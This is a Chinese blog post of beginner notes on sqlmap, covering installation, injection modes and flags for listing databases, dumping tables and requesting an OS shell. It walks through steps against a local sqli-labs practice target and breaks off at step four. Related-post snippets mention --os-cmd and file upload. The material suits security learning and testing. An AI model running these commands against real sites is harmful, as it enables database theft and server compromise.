常子骎的笔记

最新推荐文章于 2023-06-20 08:07:55 发布
最新推荐文章于 2023-06-20 08:07:55 发布
阅读量59 收藏
点赞数
文章标签: 数据库架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67871894/article/details/124032031
版权

​ 1.SQLmap 
是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。
支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server,  Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。
(1)      安装sqlmap前,需要先安装Python3.X
Python Releases for Windows | Python.org
(2)      在环境变量path中,增加python3.x 安装路径
(3)      下载sqlmap并解压缩:
地址:sqlmap: automatic SQL injection and database takeover tool
Python sqlmap.py -u http://xxx.xxx.xxx/
Python sqlmap.py –help 查看帮助 borp
 sqlmap支持五种不同的注入模式:
UNION query SQL injection(可联合查询注入) 
uError-based SQL injection(报错型注入) 
uBoolean-based blind SQL injection(布尔型注入) 
uTime-based blind SQL injection(基于时间延迟注入) 
uStacked queries SQL injection(可多语句查询注入) 
2.sqlmap 常用命令参数
-u  /--url  最基本格式 sqlmap -u “XXXXXXXXXXXXX/index.pho?id=1”
-m 从文本中获取多个目标扫描,但是每一个一个url. sqlmap -m urllist.txt
-r 从文件中加载HTTP请求,这样的话就不需要再去设定cookie,POST数据….
--dbs 返回当前连接的数据库
--current-db 返回当前网站数据库的数据库用户
-D 指定数据库系统的数据库名
--tables 列举数据库表
-T 指定数据库表名
--columns 列举数据库表中的字段
-C 指定数据库表中的字段名
--dump 获取整个表的数据
3.设置回显等级
参数: -v默认为1
0 只显示python错误以及严重的信息
1 基本信息和警告信息
2 debug信息
3 注入的payload
(级别越高显示信息越多)
 4同时显示HTTP请求。
5同时显示HTTP响应头。
6同事显示HTTP响应页面。
--data 把数以post方式提交,sqlmap会像检测GET参数一样检测POST过去的参数。
--cookie (用于区分用户)
可能会有漏洞,当web登录时,抓取数据包。
 4.设置HTTP数据包相关参数
HTTP User-Agent 头
参数:--random-agent 会从sqlmap/txt/user-agents.txt中随机产生User-Agent头。
sqlmap -u “http://www.target.com” --level 3 --andom-agent --dbs
sqlmap 检查uesr-agent中的注入点, level>=3才会去检查user-agent头是否存在注入漏洞
5.设定探测等级:--level
共有五个等级 默认为1 sqlmap使用的payload可以在xml/payloads.xml中看到
--users 列数据库管理用户
--current-user 在数据库中,目前连接的用户
--is-dba 判断当前是否为管理,是的话返回true
--proxy 指定一个代理服务器  eg: -proxy http://xxxxxx.8080
--os-shell 前提:需要网站的物理路径,其次是需要有FIILE权限
 6.Sqlmap“六步”
第一步:判断是否注是注入点
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)”
检测该网站是否存在漏洞   白色加粗字体为注入点 也就是攻击对象

第二步:获取数据库
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” –dbs

第三步:查看当前应用程序所用数据库
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)”  --current-db

四:列出指定数据库的所有表
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security(目标数据库)”—tables

m0_67871894
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap
m0_65332604的博客
04-06 2112
SQLmap
sqlmap常用基础命令
最新发布
m0_73826804的博客
02-21 466
-os-cmd,--os-shell 运行任意操作系统命令(仅支持MySQL、PostgreSQL、SQL Server)--file-write "本地文件路径" --file-dest "远程绝对路径" 上传文件到数据库服务器中。--sql-shell 运行自定义SQL语句 用法:sqlmap -u url --sql-shell。sqlmap -u url -D 数据库名 -T 表名 --columns #列出字段。sqlmap -u url -D 数据库名 -T 表名 --dump。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap 用法
qq_41661777的博客
02-14 178
1、 判断是否存在注入 sqlmap -u url?id=1 当注入点后面参数大于等于两个时需要加双引号 sqlmap -u "url?id&uid=2" 2、判断文本是否存在注入 使用抓包生成web数据包require.txt sqlmap -r require.txt 3、基本注入命令 sqlmap -u url?id=1 --dbs ...
sqlmap基本使用方法
zjc的专栏
05-16 4536
sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。 基本语法 1.先进行注入点探测,常规语法是: python sqlmap.py –u [url] 说明:url 一般选择包括参数输入的链接。如果是get方法,就直接跟在url后面用?补充参数。如果是...
一份较为详细的《常微分方程》笔记
08-03
《常微分方程》是一门研究物体动态行为和系统演变的重要数学学科,这份194页的学习笔记全面概述了该领域的基础知识和求解方法。笔记由Gabriel Nagy撰写,来自密歇根州立大学数学系,内容涵盖了一阶和二阶常微分方程...
电子笔记
05-21
个人强烈推荐的电子笔记,用过各种, 这个最强大。
oracle笔记子查询
09-21
oracle笔记子查询,有子查询相关的知识点笔记和具体的案例代码!
电子工程师笔记
04-23
电子工程师笔记
最好的离线笔记.zip
06-08
标题提到的"最好的离线笔记.zip"很可能是一个包含了这样一款优秀离线笔记应用的压缩包文件。下面我们将详细探讨离线笔记的优缺点、关键功能以及如何挑选适合自己的离线笔记软件。 首先,离线笔记的最大优势在于其...
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sql注入
zejiiii的博客
02-15 3042
SQL注入 一 注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲注 报错注入 时间盲注 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
SQL无列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2702
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
SQL注入(三)
weixin_48914455的博客
02-27 3741
报错注入,延时注入,布尔盲注
sql注入常用语句
weixin_30537451的博客
03-07 957
SQL注入 1. 什么是sql注入 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 2. sql注入类型 按照注入点类型来分类 (1)数字型注入点 许多网页链接有类似的结构http://xxx.com/users.php?id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数...
mysql中的几种join 及 full join问题
热门推荐
lukabruce的博客
06-04 7万+
【注:本文转自 https://blog.csdn.net/u012410733/article/details/63684663】 【注意】:Oracle数据库支持full join,mysql是不支持full join的,但仍然可以同过左外连接+ union+右外连接实现 初始化SQL语句: /*join 建表语句*/ drop database if exists test; ...
Python编程SqlmapAPI批量扫描sql注入
kriesa的博客
07-13 669
Python编程SqlmapAPI批量扫描sql注入
Sqlmap使用教程
B-Tree
02-24 3729
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
一步一步解读sqlmap是如何操作的
u013473481的专栏
01-14 954
1. 基础用法:   ./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库   ./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库   ./sqlmap.py -u “注入地址” -v 1 –users // 列数据库用户   ./sqlmap.py -u “注入地址” -v 1 –current-user // 当前
张飞电子bldc笔记
09-17
《张飞电子bldc笔记》是一本关于无刷直流电机(BLDC)的学习记录和研究成果的笔记。张飞是一位电子工程师,他对电机技术有着浓厚的兴趣,因此决定记录和分享自己在BLDC方面的学习心得。 这本笔记包含了BLDC的基本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值